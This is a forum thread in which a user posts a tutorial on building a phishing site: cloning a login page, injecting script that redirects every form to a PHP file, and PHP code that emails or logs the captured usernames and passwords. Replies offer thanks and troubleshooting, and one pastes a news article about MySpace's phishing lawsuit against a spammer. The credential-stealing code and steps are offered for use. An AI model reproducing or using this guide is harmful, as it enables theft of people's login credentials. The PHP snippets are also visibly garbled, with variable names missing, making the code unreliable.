How to Create your OWN Phishing Site

[cobey321]

How to create your own phishing site.

A phishing site is usually made up of 1 to 3 files that are usually scripted in HTML or PHP. The first file is usually a HTML login page with a small script inside that tells the second file to record whatever they type in. The process file is usually coded in PHP, the process file writes to the third file, which is usually the log file, which is usually in a txt format.

Go to a login page, any page at all that you want to make into a fake login, lets use Myspace for example. Go to "www.worldofwarcraft.com" then on your web browser on the menu bar go to "File>>Save Page As" save it in a folder on your desktop called "Fake Login" (please make sure your not logged in when you save the page) then go to the file, and where you see the file you saved rename it, "index.html", then right click it and select the option edit, than add the following code to the bottom.

Code:

<script>
var x;for(x in document.forms){void(document.forms[x].action="process.php")};
</script>

Now there are two ways to write up the process file. First one is where you get the login emailed (Part1) to you, second is where your login gets recorded into a text document (Part2).

Part1.

Than save. Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and than copy and paste the following code inside.

Code:

<?php
 = "POST DATAn---------------------------------n";
function log(, ){ global ;  .= ." = ".."n"; }
array_walk(Array, "log");
mail("[email protected]", "Fake Login", );
header("Location: http://www.website.com");
?>

Now we have to do a bit of editing, on the code above, on the 5th line of code where it says "[email protected]" replace that with your own email for example "[email protected]". Now on the 6th line of code where it says "http://www.website.com" replace that with a address that you want your user to be forwarded to after they login to your login file, for example "www.worldofwarcraft.com". Now save that file as "process.php".


Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and then copy and paste the following code inside.

Code:

<?php
header("Location: "link");
 = fopen("logs.txt", "a");
foreach(Array as  => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
fclose();
exit;
?>

Now for Part2 script we will have to do some editing, on the second line of code where it says "link" change that to where you want the user to go after they enter their login on your login page and now save that file as "process.php". Then create a text document called "logs.txt" thats where your logins will be recorded.

Now that is you successfully created your own phishing site. Please note that some background images may not appear in your phishing site therefore you may have to add them manually. Hopfully this helped some people and if anyone finds any corrections in the post please tell me. Becasue im a bit tired and im losing concentration :P

Enjoy my friends.

Credits to someone not sure who this was saved on my comp a while ago.

[jeleopard]

sweet testing now

[Xtinction]

I HATE LEACHERS THAT SAY!!! YOU GUYS CANT GIVE REP!!!!!!!!

lol i like that sig

[jeleopard]

keep on getting

Code:

 File not found         

Firefox can't find the file at /C:/Users/*******/Desktop/process.php.  


    *   Check the file name for capitalization or other typing errors.

    *   Check to see if the file was moved, renamed or deleted.

have double check everything

[-=Swift=-]

Go to a login page, any page at all that you want to make into a fake login, lets use Myspace for example. Go to "www.worldofwarcraft.com" then on your web browser on the menu bar go to "File>>Save Page As" save it in a folder on your desktop called "Fake Login" (please make sure your not logged in when you save the page) then go to the file, and where you see the file you saved rename it, "index.html", then right click it and select the option edit, than add the following code to the bottom.

Since when is MySpace at World of Warcraft Community Site

[samsta458]

Myspace = WoW. Nice guide bud, not sure if this should be in the scamming section? anyhow +rep

[losmix]

there is no index.html in folder and i have firefox

[BiG BaLLa]

How to create your own phishing site.
lets use Myspace for example.

Lawl, lets use myspace :P

A federal judge in Los Angeles on this week awarded MySpace more than $225 million in its lawsuit against "Spam King" Sanford Wallace and his business partner Walter Rines. Judge Audrey B. Collins of United States District Court in the Central District of California ruled in MySpace's favor on Monday after the two men failed to show up in court, according to MySpace. The judge's ruling also enjoins Wallace and Rines from accessing MySpace or encouraging others to do so.
"MySpace has zero tolerance for those who attempt to act illegally on our site," said Hemanshu Nigam, chief security officer of MySpace, in an e-mailed statement. "The Federal District Court in Los Angeles awarded MySpace $223,777,500 under the federal CAN-SPAM Act and $1,500,000 under the California anti-phishing statute. User engagement is up 32 percent year over year while spam is significantly decreasing, proving efforts like this are working. "
While many spammers have been designated "Spam King," Wallace earned the title back in the late 1990s as a result of spam messages sent by his company Cyber Promotions.
Though Wallace appeared to leave the business in 1999 following legal troubles, a subsequence venture of his prompted an FTC lawsuit for distributing spyware that eventually resulted in a fine of over $4 million.
In 2007, MySpace filed its lawsuit against Wallace.
Sometime around October 2006, Wallace and Rines began creating MySpace accounts and hijacking existing ones via phishing attacks to send hundreds of thousands of spam messages and comments to other MySpace members, according to court documents filed by MySpace. In all, the pair made use of at least three hundred thousand MySpace profiles.
"By using hijacked accounts to send these unsolicited messages, defendants created the false impression that these messages came from a MySpace recipient's friend or another legitimate MySpace user, rather than from defendants," court documents state.
Between October 2006 and April 2007, Wallace said he earned between $200,000 and $500,000, according to court documents.
Despite winning in court, it remains to be seen whether MySpace will be able to collect its judgment.
Over at SanfordWallace.com, which states, "Yes, this page is operated by the REAL Sanford Wallace," someone claiming to be Sanford Wallace responded to MySpace's victory with sarcasm.
"I just read that a court awarded MySpace a $234 million dollar judgment against me," the blog says. "That's pretty amazing since I haven't even been served in this case since the preliminary injunction about a year ago. Regardless, the check's in the mail."
E-mail seeking to verify the identity of the site owner was not immediately returned. However, the address used to register sanfordwallace.com is the same Las Vegas address used to serve Wallace with legal documents.
At the same time, the blogger's claim to have not heard about this case since being served a year ago is inconsistent with the court record, which indicates Wallace was last served on January 22, 2008.
The blogger who claims to be Wallace also states that MySpace hired Wallace's company when it was starting out to promote the site.
"I wonder how many people actually know how MySpace got started," the blog post says. "Their original team (the people who also started the company xDrive) HIRED my company to send 'tell-a-friend' messages through e-mail to promote them several years ago, and it was actually MY TRAFFIC that helped LAUNCH MySpace. Their partner at the time was eUniverse, [which] ran the biggest 'tell-a-friend' spam network on the Internet."
A MySpace spokesperson was unable to comment on this claim while the company looks into it. True or not, Wallace still owes many millions.

From

Code:

http://www.informationweek.com/news/internet/social_network/showArticle.jhtml?articleID=207800142

[Drythils]

XD That report on myspace made me lmao.

Nice thread though, gonna Mark it to save 4 later. +rep